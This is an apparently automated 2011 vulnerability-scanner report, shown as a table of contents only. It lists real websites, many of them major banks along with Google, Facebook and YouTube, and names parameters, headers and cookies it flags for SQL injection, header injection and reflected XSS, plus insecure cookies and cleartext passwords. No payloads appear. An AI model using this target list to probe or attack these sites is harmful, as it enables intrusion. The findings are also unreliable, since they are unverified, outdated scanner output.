The DORK Report, XSS, SQL Injection, HTTP Header Injection, 2-4-2011

The DORK Report for Feb 4, 2011 | CloudScan Vulnerability Crawler

Report generated by CloudScan Vulnerability Crawler at Sun Feb 06 13:16:15 CST 2011.

DORK CWE-79 XSS Report

1. SQL injection

1.1. http://www.learningsolutions.com.hk/index.php [User-Agent HTTP header]

1.2. http://www.thestandard.com.hk/news_detail.asp [art_id parameter]

1.3. http://www.youtube.com/ [Referer HTTP header]

2. HTTP header injection

2.1. http://bs.serving-sys.com/BurstingPipe/adServer.bs [eyeblaster cookie]

2.2. http://locators.bankofamerica.com/locator/locator/LocatorAction.do [REST URL parameter 3]

2.3. http://www.fis.com/fis/worldnews/worldnews.asp [REST URL parameter 1]

2.4. http://www.fis.com/fis/worldnews/worldnews.asp [REST URL parameter 2]

3. Cross-site scripting (reflected)

3.1. http://ad.thehill.com/www/delivery/al.php [shifth parameter]

3.2. http://ad.thehill.com/www/delivery/al.php [shiftv parameter]

3.3. http://api.facebook.com/restserver.php [method parameter]

3.4. http://api.facebook.com/restserver.php [urls parameter]

3.5. http://api.viglink.com/api/click [format parameter]

3.6. http://api.viglink.com/api/click [jsonp parameter]

3.7. http://api.viglink.com/api/click [out parameter]

3.8. http://api.viglink.com/api/click [out parameter]

3.9. http://api.viglink.com/api/ping [key parameter]

3.10. https://arbor.custhelp.com/app/utils/account_assistance//OTc4NC9zaWQvUm41dkhFbGs= [REST URL parameter 4]

3.11. https://arbor.custhelp.com/app/utils/account_assistance//OTc4NC9zaWQvUm41dkhFbGs= [name of an arbitrarily supplied request parameter]

3.12. https://arbor.custhelp.com/app/utils/account_assistance//OTc4NC9zaWQvUm41dkhFbGs= [nsextt parameter]

3.13. https://arbor.custhelp.com/app/utils/account_assistance//OTc4NC9zaWQvUm41dkhFbGs= [nsextt parameter]

3.14. https://arbor.custhelp.com/app/utils/account_assistance/session/L3RpbWUvMTI5NjY4OTc4NC9zaWQvUm41dkhFbGs= [REST URL parameter 4]

3.15. https://arbor.custhelp.com/app/utils/account_assistance/session/L3RpbWUvMTI5NjY4OTc4NC9zaWQvUm41dkhFbGs= [REST URL parameter 5]

3.16. http://citi.bridgetrack.com/a/s/ [BT_PID parameter]

3.17. http://citi.bridgetrack.com/a/s/ [name of an arbitrarily supplied request parameter]

3.18. http://community.invisionpower.com/blog/1174/entry-5785-ipnexus-12-dev-update-cpanel-integration/ [name of an arbitrarily supplied request parameter]

3.19. http://community.invisionpower.com/blog/1174/entry-5785-ipnexus-12-dev-update-cpanel-integration/ [name of an arbitrarily supplied request parameter]

3.20. http://community.invisionpower.com/blog/1174/entry-5785-ipnexus-12-dev-update-cpanel-integration/page__show__newcomment [REST URL parameter 4]

3.21. http://community.invisionpower.com/blog/1174/entry-5785-ipnexus-12-dev-update-cpanel-integration/page__show__newcomment [REST URL parameter 4]

3.22. http://community.invisionpower.com/blog/1174/entry-5791-ipboard-320-dev-update-calendar-improvements-part-i-seo-improvements/ [name of an arbitrarily supplied request parameter]

3.23. http://community.invisionpower.com/blog/1174/entry-5791-ipboard-320-dev-update-calendar-improvements-part-i-seo-improvements/ [name of an arbitrarily supplied request parameter]

3.24. http://community.invisionpower.com/blog/1174/entry-5791-ipboard-320-dev-update-calendar-improvements-part-i-seo-improvements/page__show__newcomment [REST URL parameter 4]

3.25. http://community.invisionpower.com/blog/1174/entry-5791-ipboard-320-dev-update-calendar-improvements-part-i-seo-improvements/page__show__newcomment [REST URL parameter 4]

3.26. http://community.invisionpower.com/blog/1174/entry-5797-ipnexus-12-dev-update-payment-improvements-anti-fraud-protection/ [name of an arbitrarily supplied request parameter]

3.27. http://community.invisionpower.com/blog/1174/entry-5797-ipnexus-12-dev-update-payment-improvements-anti-fraud-protection/ [name of an arbitrarily supplied request parameter]

3.28. http://community.invisionpower.com/blog/1174/entry-5797-ipnexus-12-dev-update-payment-improvements-anti-fraud-protection/page__show__newcomment [REST URL parameter 4]

3.29. http://community.invisionpower.com/blog/1174/entry-5797-ipnexus-12-dev-update-payment-improvements-anti-fraud-protection/page__show__newcomment [REST URL parameter 4]

3.30. http://community.invisionpower.com/blog/1174/entry-5807-ipnexus-12-dev-update-custom-customer-fields/ [name of an arbitrarily supplied request parameter]

3.31. http://community.invisionpower.com/blog/1174/entry-5807-ipnexus-12-dev-update-custom-customer-fields/ [name of an arbitrarily supplied request parameter]

3.32. http://community.invisionpower.com/blog/1174/entry-5807-ipnexus-12-dev-update-custom-customer-fields/page__show__newcomment [REST URL parameter 4]

3.33. http://community.invisionpower.com/blog/1174/entry-5807-ipnexus-12-dev-update-custom-customer-fields/page__show__newcomment [REST URL parameter 4]

3.34. http://community.invisionpower.com/blog/2568/entry-5789-viril-101-release-with-bug-fixes-new-features/ [name of an arbitrarily supplied request parameter]

3.35. http://community.invisionpower.com/blog/2568/entry-5789-viril-101-release-with-bug-fixes-new-features/ [name of an arbitrarily supplied request parameter]

3.36. http://community.invisionpower.com/blog/2568/entry-5789-viril-101-release-with-bug-fixes-new-features/page__show__newcomment [REST URL parameter 4]

3.37. http://community.invisionpower.com/blog/2568/entry-5789-viril-101-release-with-bug-fixes-new-features/page__show__newcomment [REST URL parameter 4]

3.38. http://community.invisionpower.com/files/file/3935-sos31-improve-next-previous-issue-links-in-iptracker-v100/ [name of an arbitrarily supplied request parameter]

3.39. http://community.invisionpower.com/files/file/3936-ipdownloads-file-version-in-support-topic-title/ [name of an arbitrarily supplied request parameter]

3.40. http://community.invisionpower.com/files/file/3937-peace/ [name of an arbitrarily supplied request parameter]

3.41. http://community.invisionpower.com/files/file/3938-turkish-turkce-language-pack-for-m31-videos-system-203-public-side/ [name of an arbitrarily supplied request parameter]

3.42. http://community.invisionpower.com/files/file/3939-vietnamese-3xx-lang/ [name of an arbitrarily supplied request parameter]

3.43. http://community.invisionpower.com/files/file/3940-dp31-ihost/ [name of an arbitrarily supplied request parameter]

3.44. http://community.invisionpower.com/files/file/3941-vanilla-valentine/ [name of an arbitrarily supplied request parameter]

3.45. http://community.invisionpower.com/files/file/3942-sos31-file-version-in-online-list/ [name of an arbitrarily supplied request parameter]

3.46. http://community.invisionpower.com/files/file/3943-speed/ [name of an arbitrarily supplied request parameter]

3.47. http://community.invisionpower.com/files/file/3944-ipchat-12-turkish-language-pack/ [name of an arbitrarily supplied request parameter]

3.48. http://community.invisionpower.com/resources/documentation/index.html [name of an arbitrarily supplied request parameter]

3.49. http://community.invisionpower.com/resources/documentation/index.html/_/documentation/getting-started/installation-r17 [name of an arbitrarily supplied request parameter]

3.50. http://community.invisionpower.com/resources/documentation/index.html/_/documentation/getting-started/ipnexus-getting-started-guide-r514 [name of an arbitrarily supplied request parameter]

3.51. http://community.invisionpower.com/resources/documentation/index.html/_/documentation/getting-started/upgrading-r18 [name of an arbitrarily supplied request parameter]

3.52. http://community.invisionpower.com/resources/documentation/index.html/_/knowledge-base/recurring-non-version-specific-issues/encoded-files-with-zend-guard-r536 [name of an arbitrarily supplied request parameter]

3.53. http://community.invisionpower.com/resources/official.html [name of an arbitrarily supplied request parameter]

3.54. http://insidejapantours.com/japan-news/1671/tuna-costs-254-000-in-japan/ [REST URL parameter 2]

3.55. http://insidejapantours.com/japan-news/1671/tuna-costs-254-000-in-japan/ [REST URL parameter 3]

3.56. http://news.change.org/stories/nobu-ignores-18000-people-asking-for-an-end-to-bluefin-sushi [name of an arbitrarily supplied request parameter]

3.57. https://privacyassist.bankofamerica.com/Pages/English/In_Activation.asp [name of an arbitrarily supplied request parameter]

3.58. https://privacyassist.bankofamerica.com/Pages/English/In_Activation.asp [name of an arbitrarily supplied request parameter]

3.59. https://privacyassist.bankofamerica.com/Pages/English/In_Activation.asp [name of an arbitrarily supplied request parameter]

3.60. http://search.wachovia.com/selfservice/microsites/wachoviaSearchEntry.do [name of an arbitrarily supplied request parameter]

3.61. http://search.wareseeker.com/ip-board/ [REST URL parameter 1]

3.62. http://search.wareseeker.com/ip-board/ [name of an arbitrarily supplied request parameter]

3.63. http://tags.expo9.exponential.com/tags/WareSeekercom/ROS/tags.js [REST URL parameter 2]

3.64. http://tags.expo9.exponential.com/tags/WareSeekercom/ROS/tags.js [REST URL parameter 3]

3.65. http://thehill.com/blogs/e2-wire/677-e2-wire/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more [REST URL parameter 3]

3.66. http://thehill.com/blogs/e2-wire/677-e2-wire/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more [REST URL parameter 4]

3.67. http://thehill.com/blogs/e2-wire/677-e2-wire/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more [REST URL parameter 4]

3.68. http://weather.weatherbug.com/desktop-weather/web-widgets/getSticker.html [ZCode parameter]

3.69. http://weather.weatherbug.com/desktop-weather/web-widgets/getSticker.html [ZCode parameter]

3.70. http://www.arbornetworks.com/index.php [Itemid parameter]

3.71. http://www.arbornetworks.com/index.php [id parameter]

3.72. http://www.arbornetworks.com/index.php [name of an arbitrarily supplied request parameter]

3.73. http://www.bankofamerica.com/creditcards/index.cfm [REST URL parameter 1]

3.74. http://www.bankofamerica.com/deposits/checksave/index.cfm [REST URL parameter 1]

3.75. http://www.bankofamerica.com/deposits/checksave/index.cfm [REST URL parameter 2]

3.76. http://www.bankofamerica.com/financialtools/index.cfm [REST URL parameter 1]

3.77. http://www.bankofamerica.com/findit/locator.cfm [REST URL parameter 1]

3.78. http://www.bankofamerica.com/help/equalhousing.cfm [REST URL parameter 1]

3.79. http://www.bankofamerica.com/help/equalhousing_popup.cfm [REST URL parameter 1]

3.80. http://www.bankofamerica.com/help/index.cfm [REST URL parameter 1]

3.81. http://www.bankofamerica.com/loansandhomes/index.cfm [REST URL parameter 1]

3.82. http://www.bankofamerica.com/onlinebanking/index.cfm [REST URL parameter 1]

3.83. http://www.bankofamerica.com/pap/index.cfm [REST URL parameter 1]

3.84. http://www.bankofamerica.com/studentbanking/index.cfm [REST URL parameter 1]

3.85. http://www.bankofamerica.com/vehicle_and_personal_loans/index.cfm [REST URL parameter 1]

3.86. http://www.branchmap.com/mapserver.php [city parameter]

3.87. http://www.branchmap.com/mapserver.php [dist parameter]

3.88. http://www.branchmap.com/mapserver.php [zip parameter]

3.89. http://www.branchmap.com/mapserver.php [zoom parameter]

3.90. http://www.care2.com/greenliving/bluefin-tuna-sells-for-396000.html [REST URL parameter 2]

3.91. http://www.care2.com/greenliving/bluefin-tuna-sells-for-396000.html [name of an arbitrarily supplied request parameter]

3.92. http://www.care2.com/greenliving/bluefin-tuna-sells-for-396000.html [name of an arbitrarily supplied request parameter]

3.93. http://www.care2.com/greenliving/bluefin-tuna-sells-for-396000.html [name of an arbitrarily supplied request parameter]

3.94. http://www.chasemilitary.com/ [name of an arbitrarily supplied request parameter]

3.95. http://www.chasemilitary.com/Default.aspx [ada parameter]

3.96. http://www.chasemilitary.com/Default.aspx [name of an arbitrarily supplied request parameter]

3.97. http://www.google.com/advanced_search [hl parameter]

3.98. http://www.google.com/advanced_search [name of an arbitrarily supplied request parameter]

3.99. http://www.google.com/advanced_search [prmd parameter]

3.100. http://www.google.com/advanced_search [q parameter]

3.101. http://www.google.com/images [q parameter]

3.102. http://www.invisionpower.com/products/board/features/ [name of an arbitrarily supplied request parameter]

3.103. http://www.invisionpower.com/products/nexus/features/store.php [name of an arbitrarily supplied request parameter]

3.104. http://www.jpost.com/ArtsAndCulture/FoodAndWine/Article.aspx [name of an arbitrarily supplied request parameter]

3.105. http://www.learningsolutions.com.hk/index.php [Itemid parameter]

3.106. http://www.macaudailytimes.com.mo/times-lab/21109-Tragedy-our-Commons.html [name of an arbitrarily supplied request parameter]

3.107. http://www.merrilledge.com/m/pages/self-directed-investing.aspx [name of an arbitrarily supplied request parameter]

3.108. http://www.merrilledge.com/m/pages/self-directed-investing.aspx [src_cd parameter]

3.109. http://www.merrilledge.com/m/pages/zero-dollar-trades.aspx [name of an arbitrarily supplied request parameter]

3.110. http://www.merrilledge.com/m/pages/zero-dollar-trades.aspx [src_cd parameter]

3.111. https://www.merrilledge.com/m/pages/home.aspx [name of an arbitrarily supplied request parameter]

3.112. http://www.retirement.merrilledge.com/IRA/ScriptResource.axd [d parameter]

3.113. http://www.retirement.merrilledge.com/IRA/WebResource.axd [d parameter]

3.114. http://www.retirement.merrilledge.com/IRA/pages/home.aspx [name of an arbitrarily supplied request parameter]

3.115. https://www2.bankofamerica.com/promos/jump/greatdeals/ [name of an arbitrarily supplied request parameter]

3.116. https://privacyassist.bankofamerica.com/Pages/English/In_Activation.asp [Referer HTTP header]

3.117. http://solutions.liveperson.com/ref/lppb.asp [Referer HTTP header]

3.118. http://www.bankofamerica.com/help/equalhousing_popup.cfm [Referer HTTP header]

3.119. http://www.jpmorgan.com/pages/jpmorgan [User-Agent HTTP header]

3.120. http://www.arbornetworks.com/ [mbfcookie[lang] cookie]

3.121. http://www.arbornetworks.com/cleanpipes [mbfcookie[lang] cookie]

3.122. http://www.arbornetworks.com/cn/865.html [mbfcookie[lang] cookie]

3.123. http://www.arbornetworks.com/cn/infrastructure-security-report.html [mbfcookie[lang] cookie]

3.124. http://www.arbornetworks.com/contact [mbfcookie[lang] cookie]

3.125. http://www.arbornetworks.com/de/5.html [mbfcookie[lang] cookie]

3.126. http://www.arbornetworks.com/de/infrastructure-security-report.html [mbfcookie[lang] cookie]

3.127. http://www.arbornetworks.com/deeppacketinspection [mbfcookie[lang] cookie]

3.128. http://www.arbornetworks.com/en/9.html [mbfcookie[lang] cookie]

3.129. http://www.arbornetworks.com/en/about-arbor-networks-a-leader-in-network-monitoring-and-security-solutions.html [mbfcookie[lang] cookie]

3.130. http://www.arbornetworks.com/en/arbor-in-action-global-network-security-solution-resources.html [mbfcookie[lang] cookie]

3.131. http://www.arbornetworks.com/en/arbor-networks-sixth-annual-worldwide-infrastructure-security-report.html [mbfcookie[lang] cookie]

3.132. http://www.arbornetworks.com/en/arbor-powers-continent-8-technologies-ddos-mitigation-service.html [mbfcookie[lang] cookie]

3.133. http://www.arbornetworks.com/en/asert-arbor-security-engineering-response-team-2.html [mbfcookie[lang] cookie]

3.134. http://www.arbornetworks.com/en/atlas-global-network-threat-analysis-460.html [mbfcookie[lang] cookie]

3.135. http://www.arbornetworks.com/en/channel-partners-3.html [mbfcookie[lang] cookie]

3.136. http://www.arbornetworks.com/en/com-5fcontent/view-2.html [mbfcookie[lang] cookie]

3.137. http://www.arbornetworks.com/en/com-5fcontent/view-3.html [mbfcookie[lang] cookie]

3.138. http://www.arbornetworks.com/en/contact-us-4.html [mbfcookie[lang] cookie]

3.139. http://www.arbornetworks.com/en/contact-us.html [mbfcookie[lang] cookie]

3.140. http://www.arbornetworks.com/en/customer-solution-briefs.html [mbfcookie[lang] cookie]

3.141. http://www.arbornetworks.com/en/fingerprint-sharing-alliance-defending-against-network-attacks-2.html [mbfcookie[lang] cookie]

3.142. http://www.arbornetworks.com/en/ipv6-report.html [mbfcookie[lang] cookie]

3.143. http://www.arbornetworks.com/en/meet-our-partners.html [mbfcookie[lang] cookie]

3.144. http://www.arbornetworks.com/en/network-monitoring-security-news-events.html [mbfcookie[lang] cookie]

3.145. http://www.arbornetworks.com/en/network-security-experts-2.html [mbfcookie[lang] cookie]

3.146. http://www.arbornetworks.com/en/network-security-monitoring-solutions-for-your-industry.html [mbfcookie[lang] cookie]

3.147. http://www.arbornetworks.com/en/network-security-research-2.html [mbfcookie[lang] cookie]

3.148. http://www.arbornetworks.com/en/network-security-visibility-products-235.html [mbfcookie[lang] cookie]

3.149. http://www.arbornetworks.com/en/network-solutions-we-provide.html [mbfcookie[lang] cookie]

3.150. http://www.arbornetworks.com/en/news-events.html [mbfcookie[lang] cookie]

3.151. http://www.arbornetworks.com/en/partnership-inquiry-form.html [mbfcookie[lang] cookie]

3.152. http://www.arbornetworks.com/en/services-network-support-maintenance-training-2.html [mbfcookie[lang] cookie]

3.153. http://www.arbornetworks.com/en/solution-partners-4.html [mbfcookie[lang] cookie]

3.154. http://www.arbornetworks.com/en/solutions-for-places-in-your-network.html [mbfcookie[lang] cookie]

3.155. http://www.arbornetworks.com/en/solutions-for-your-business-needs.html [mbfcookie[lang] cookie]

3.156. http://www.arbornetworks.com/en/technology-partners-4.html [mbfcookie[lang] cookie]

3.157. http://www.arbornetworks.com/en/what-we-do-network-security-solutions-services.html [mbfcookie[lang] cookie]

3.158. http://www.arbornetworks.com/en/white-papers-global-network-security-topics-2.html [mbfcookie[lang] cookie]

3.159. http://www.arbornetworks.com/es/5.html [mbfcookie[lang] cookie]

3.160. http://www.arbornetworks.com/es/infrastructure-security-report.html [mbfcookie[lang] cookie]

3.161. http://www.arbornetworks.com/fr/4.html [mbfcookie[lang] cookie]

3.162. http://www.arbornetworks.com/fr/infrastructure-security-report.html [mbfcookie[lang] cookie]

3.163. http://www.arbornetworks.com/index.php [mbfcookie[lang] cookie]

3.164. http://www.arbornetworks.com/it [mbfcookie[lang] cookie]

3.165. http://www.arbornetworks.com/it/infrastructure-security-report.html [mbfcookie[lang] cookie]

3.166. http://www.arbornetworks.com/jp/2.html [mbfcookie[lang] cookie]

3.167. http://www.arbornetworks.com/jp/infrastructure-security-report.html [mbfcookie[lang] cookie]

3.168. http://www.arbornetworks.com/kr/2.html [mbfcookie[lang] cookie]

3.169. http://www.arbornetworks.com/kr/network-infrastructure-security-report.html [mbfcookie[lang] cookie]

3.170. http://www.arbornetworks.com/privacy_policy.php [mbfcookie[lang] cookie]

3.171. https://www.arbornetworks.com/ [mbfcookie[lang] cookie]

3.172. https://www.arbornetworks.com/en/lost-password-3.html [mbfcookie[lang] cookie]

3.173. https://www.arbornetworks.com/en/partner-portal-home.html [mbfcookie[lang] cookie]

3.174. https://www.arbornetworks.com/index.php [mbfcookie[lang] cookie]

3.175. https://www.arbornetworks.com/index.php [mbfcookie[lang] cookie]

3.176. https://www.arbornetworks.com/register.html [mbfcookie[lang] cookie]

3.177. https://www.bankofamerica.com/privacy/Control.do [BOA_0020 cookie]

3.178. https://www.bankofamerica.com/privacy/index.jsp [BOA_0020 cookie]

3.179. https://www.bankofamerica.com/smallbusiness/index.jsp [BOA_0020 cookie]

3.180. https://www.merrilledge.com/m/pages/merrill-edge-advisory-center.aspx [name of an arbitrarily supplied request parameter]

3.181. https://www.merrilledge.com/m/pages/merrill-edge-advisory-center.aspx [src_cd parameter]

3.182. http://www.retirement.merrilledge.com/IRA/pages/home.aspx [pxs cookie]

4. Cleartext submission of password

4.1. http://community.invisionpower.com/index.php

4.2. http://community.invisionpower.com/resources/documentation/index.html

4.3. http://community.invisionpower.com/resources/documentation/index.html/_/documentation/getting-started/installation-r17

4.4. http://community.invisionpower.com/resources/documentation/index.html/_/documentation/getting-started/ipnexus-getting-started-guide-r514

4.5. http://community.invisionpower.com/resources/documentation/index.html/_/documentation/getting-started/upgrading-r18

4.6. http://community.invisionpower.com/resources/documentation/index.html/_/knowledge-base/recurring-non-version-specific-issues/encoded-files-with-zend-guard-r536

4.7. http://fis.com/fis/worldnews/worldnews.asp

4.8. http://insidejapantours.com/japan-news/1671/tuna-costs-254-000-in-japan/

4.9. http://ipboard-software.software.informer.com/

4.10. http://online.wsj.com/article/SB10001424052748703779704576073610615364334.html

4.11. http://online.wsj.com/article/SB10001424052748703779704576073610615364334.html

4.12. http://online.wsj.com/article/SB10001424052748703956604576110453371369740.html

4.13. http://online.wsj.com/article/SB10001424052748703956604576110453371369740.html

4.14. http://www.boston.com/yourtown/news/north_end/2011/01/fishers_fight_claims_that_blue.html

4.15. http://www.care2.com/greenliving/bluefin-tuna-sells-for-396000.html

4.16. http://www.enewspf.com/latest-news/science-a-environmental/21129-world-renowned-chefs-join-call-to-boycott-bluefin-.html

4.17. http://www.fis.com/fis/worldnews/worldnews.asp

4.18. http://www.macaudailytimes.com.mo/times-lab/21109-Tragedy-our-Commons.html

4.19. http://www.sipc.org/

5. XML injection

6. SSL cookie without secure flag set

6.1. https://arbor.custhelp.com/app/account/profile

6.2. https://arbor.custhelp.com/app/account/profile/session/L3RpbWUvMTI5NjY4OTc4NC9zaWQvUm41dkhFbGs=

6.3. https://arbor.custhelp.com/app/account/questions/list

6.4. https://arbor.custhelp.com/app/account/questions/list/session/L3RpbWUvMTI5NjY4OTc4NC9zaWQvUm41dkhFbGs=

6.5. https://arbor.custhelp.com/app/answers/docs

6.6. https://arbor.custhelp.com/app/answers/docs/session/L3RpbWUvMTI5NjY4OTc4NC9zaWQvUm41dkhFbGs=

6.7. https://arbor.custhelp.com/app/answers/list

6.8. https://arbor.custhelp.com/app/answers/list/session/L3RpbWUvMTI5NjY4OTc4NC9zaWQvUm41dkhFbGs=

6.9. https://arbor.custhelp.com/app/home

6.10. https://arbor.custhelp.com/app/ipreaddress

6.11. https://arbor.custhelp.com/app/utils/account_assistance

6.12. https://arbor.custhelp.com/app/utils/account_assistance//OTc4NC9zaWQvUm41dkhFbGs=

6.13. https://arbor.custhelp.com/app/utils/account_assistance/session/L3RpbWUvMTI5NjY4OTc4NC9zaWQvUm41dkhFbGs=

6.14. https://arbor.custhelp.com/app/webinar

6.15. https://arbor.custhelp.com/app/webinar/session/L3RpbWUvMTI5NjY4OTc4NC9zaWQvUm41dkhFbGs=

6.16. https://chaseonline.chase.com/

6.17. https://locations.citibank.com/citibankV2/prxInput.aspx

6.18. https://militarybankonline.bankofamerica.com/efs/servlet/military/login.jsp

6.19. https://myaccountsaws.navyfcu.org/mfnfopwd/

6.20. https://online.cardmemberservices.com/

6.21. https://secure.opinionlab.com/ccc01/comment_card.asp

6.22. https://secure.opinionlab.com/rate36s.asp

6.23. https://shop.aafes.com/shop/ECC/Account/OlApp.aspx

6.24. https://sitekey.bankofamerica.com/sas/resetIDScreen.do

6.25. https://sitekey.bankofamerica.com/sas/resetPasscodeScreen.do

6.26. https://sitekey.bankofamerica.com/sas/signon.do

6.27. https://support01.arbornetworks.com/

6.28. https://usa.visa.com/signaturesouthwest/index.jsp

6.29. https://usa.visa.com/specialOffers/FUSA_Amazon/offers.jsp

6.30. https://www.1sttools.com/loginout/login.asp

6.31. https://www.bankofamerica.com/

6.32. https://www.bankofamerica.com/Control.do

6.33. https://www.bankofamerica.com/credit-cards/cardoverview.action

6.34. https://www.bankofamerica.com/deposits/index.action

6.35. https://www.bankofamerica.com/homepage/WidgetAction.go

6.36. https://www.bankofamerica.com/homepage/overview.go

6.37. https://www.bankofamerica.com/homepage/stateSelect.go

6.38. https://www.bankofamerica.com/hub/index.action

6.39. https://www.bankofamerica.com/myexpression_banking/

6.40. https://www.bankofamerica.com/planning/

6.41. https://www.bankofamerica.com/planning/investments.action

6.42. https://www.bankofamerica.com/privacy/Control.do

6.43. https://www.bankofamerica.com/privacy/index.jsp

6.44. https://www.bankofamerica.com/retirementcenter/

6.45. https://www.bankofamerica.com/search/Search.do

6.46. https://www.bankofamerica.com/sitemap/index.action

6.47. https://www.bankofamerica.com/smallbusiness/index.jsp

6.48. https://www.chase.com/MilitaryLendingProgram

6.49. https://www.chase.com/ccp/index.jsp

6.50. https://www.chase.com/chf/mortgage/om_chasecom_redirect

6.51. https://www.chase.com/framework/skeletons/psmgenskel

6.52. https://www.chase.com/framework/skins/psmgenskin

6.53. https://www.chase.com/framework/skins/psmgenskin/images

6.54. https://www.chase.com/index.jsp

6.55. https://www.chase.com/online/logon/on_successful_logon.jsp

6.56. https://www.citibank.com/us/cards/index.jsp

6.57. https://www.esp01.pnc.com/LaunchPad/dflt/Login.pncadv

6.58. https://www.onlinebanking.pnc.com/alservlet/ForgotUserIdServlet

6.59. https://www.onlinebanking.pnc.com/alservlet/OnlineBankingServlet

6.60. https://www.pnc.com/webapp/sec/Forms.do

6.61. https://www.pnc.com/webapp/sec/ProductsAndService.do

6.62. https://www.pnc.com/webapp/unsec/Blank.do

6.63. https://www.pnc.com/webapp/unsec/Gateway.do

6.64. https://www.pnc.com/webapp/unsec/Homepage.do

6.65. https://www.pnc.com/webapp/unsec/Homepage.do

6.66. https://www.pnc.com/webapp/unsec/NCProductsAndService.do

6.67. https://www.pnc.com/webapp/unsec/ProductsAndService.do

6.68. https://www.pnc.com/webapp/unsec/Solutions.do

6.69. https://www.pnc.com/webapp/unsec/depositRates/init.app

6.70. https://www.pnc.com/webapp/unsec/homeEquity/init.app

6.71. https://www.retirementgold.com/

6.72. https://www.smart-hsa.com/pnc/

6.73. https://www.smart-hsa.com/pnc/

6.74. https://www4.usbank.com/internetBanking/RequestRouter

6.75. https://www4.usbank.com/internetBanking/RequestRouter

6.76. https://www4.usbank.com/internetBanking/RequestRouter

6.77. https://www4.usbank.com/internetBanking/en_us/info/BrowserRequirementsOut.jsp

6.78. https://www4.usbank.com/internetBanking/en_us/info/BrowserRequirementsOut.jsp

6.79. https://www4.usbank.com/internetBanking/en_us/info/ContactUsOut.jsp

6.80. https://www4.usbank.com/internetBanking/en_us/info/ContactUsOut.jsp

6.81. https://www6.bankofamerica.com/planning/investments.action

6.82. https://chaseonline.chase.com/auth/login.aspx

6.83. https://chaseonline.chase.com/chaseonline/reidentify/sso_reidentify.jsp

6.84. https://chaseonline.chase.com/js/Reporting.js

6.85. https://myaccounts.navyfcu.org/cgi-bin/ifsewwwc

6.86. https://online.wellsfargo.com/signon

6.87. https://onlineservices.wachovia.com/auth/AuthService

6.88. https://resources.cardmemberservices.com/MyAccounts.aspx

6.89. https://resources.chase.com/MyAccounts.aspx

6.90. https://s.xp1.ru4.com/meta

6.91. https://stg.xp1.ru4.com/meta

6.92. https://tc.bankofamerica.com/c

6.93. https://www.arbornetworks.com/

6.94. https://www.arbornetworks.com/en/lost-password-3.html

6.95. https://www.arbornetworks.com/en/partner-portal-home.html

6.96. https://www.arbornetworks.com/index.php

6.97. https://www.arbornetworks.com/register.html

6.98. https://www.bankofamerica.com/retirementcenter

6.99. https://www.capitalone.com/

6.100. https://www.capitalone.com/creditcards/gateway/

6.101. https://www.capitalone.com/indexn.php

6.102. https://www.capitalone.com/scripts/thirdparty/xplus1/xp1vars.js.php

6.103. https://www.chase.com/

6.104. https://www.chase.com/wamuwelcome3/

6.105. https://www.ibsnetaccess.com/NASApp/NetAccess/LoginDisplay

6.106. https://www.merrilledge.com/m/pages/home.aspx

6.107. https://www.merrilledge.com/m/pages/merrill-edge-advisory-center.aspx

6.108. https://www.myschedule.navyfederal.org/

6.109. https://www.mystreetscape.com/my/charteroneinvest

6.110. https://www.mystreetscape.com/my/citizensinvest

6.111. https://www.wellsfargo.com/

6.112. https://www.wellsfargo.com/Clickthrough&RequestType=Click&COID=

6.113. https://www.wellsfargo.com/about/diversity/

6.114. https://www.wellsfargo.com/autoloans/

6.115. https://www.wellsfargo.com/autoloans/apply

6.116. https://www.wellsfargo.com/browser/jaws_setting

6.117. https://www.wellsfargo.com/careers/

6.118. https://www.wellsfargo.com/checking/

6.119. https://www.wellsfargo.com/com/comintro

6.120. https://www.wellsfargo.com/credit_cards/

6.121. https://www.wellsfargo.com/credit_cards/select_card

6.122. https://www.wellsfargo.com/equity/

6.123. https://www.wellsfargo.com/equity/rate_payments/information/rate_calc

6.124. https://www.wellsfargo.com/help/

6.125. https://www.wellsfargo.com/help/faqs/signon_faqs

6.126. https://www.wellsfargo.com/help/services

6.127. https://www.wellsfargo.com/insurance/

6.128. https://www.wellsfargo.com/insurance/id_credit_protection/idtheft

6.129. https://www.wellsfargo.com/investing/hsa/enroll

6.130. https://www.wellsfargo.com/investing/investmentservices/

6.131. https://www.wellsfargo.com/investing/more

6.132. https://www.wellsfargo.com/investing/mutual_funds/

6.133. https://www.wellsfargo.com/investing/retirement/

6.134. https://www.wellsfargo.com/investing/retirement/openira/

6.135. https://www.wellsfargo.com/jump/about/fdic

6.136. https://www.wellsfargo.com/jump/applications/inprogress

6.137. https://www.wellsfargo.com/jump/wachovia/EFS/WAC1

6.138. https://www.wellsfargo.com/jump/wachovia/insurance/identity

6.139. https://www.wellsfargo.com/jump/wachovia/mortgage/firsttimebuyer

6.140. https://www.wellsfargo.com/locator

6.141. https://www.wellsfargo.com/locator/atm/preSearch

6.142. https://www.wellsfargo.com/locator/atm/search

6.143. https://www.wellsfargo.com/mortgage/

6.144. https://www.wellsfargo.com/mortgage/rates

6.145. https://www.wellsfargo.com/online_brokerage/education/trading/volatile/

6.146. https://www.wellsfargo.com/per/more/banking

6.147. https://www.wellsfargo.com/per/more/loans_credit

6.148. https://www.wellsfargo.com/personal_credit/

6.149. https://www.wellsfargo.com/personal_credit/rate_payments/rate_calc_main

6.150. https://www.wellsfargo.com/privacy_security/

6.151. https://www.wellsfargo.com/privacy_security/fraud/

6.152. https://www.wellsfargo.com/privacy_security/fraud/report/

6.153. https://www.wellsfargo.com/privacy_security/fraud/report/fraud

6.154. https://www.wellsfargo.com/privacy_security/online/guarantee

6.155. https://www.wellsfargo.com/products_services/HE_selector

6.156. https://www.wellsfargo.com/products_services/applications_viewall

6.157. https://www.wellsfargo.com/products_services/brokerage_cklist

6.158. https://www.wellsfargo.com/products_services/deposit_cklist

6.159. https://www.wellsfargo.com/products_services/pll_select

6.160. https://www.wellsfargo.com/rates/rates_viewall

6.161. https://www.wellsfargo.com/savings_cds/

6.162. https://www.wellsfargo.com/savings_cds/apply

6.163. https://www.wellsfargo.com/savings_cds/cds

6.164. https://www.wellsfargo.com/search/search

6.165. https://www.wellsfargo.com/sitemap

6.166. https://www.wellsfargo.com/student/

6.167. https://www.wellsfargo.com/student/loans/apply

6.168. https://www.wellsfargo.com/tas

6.169. https://www.wellsfargo.com/theprivatebank/

6.170. https://www.wellsfargo.com/wachovia

6.171. https://www.wellsfargo.com/wachovia/

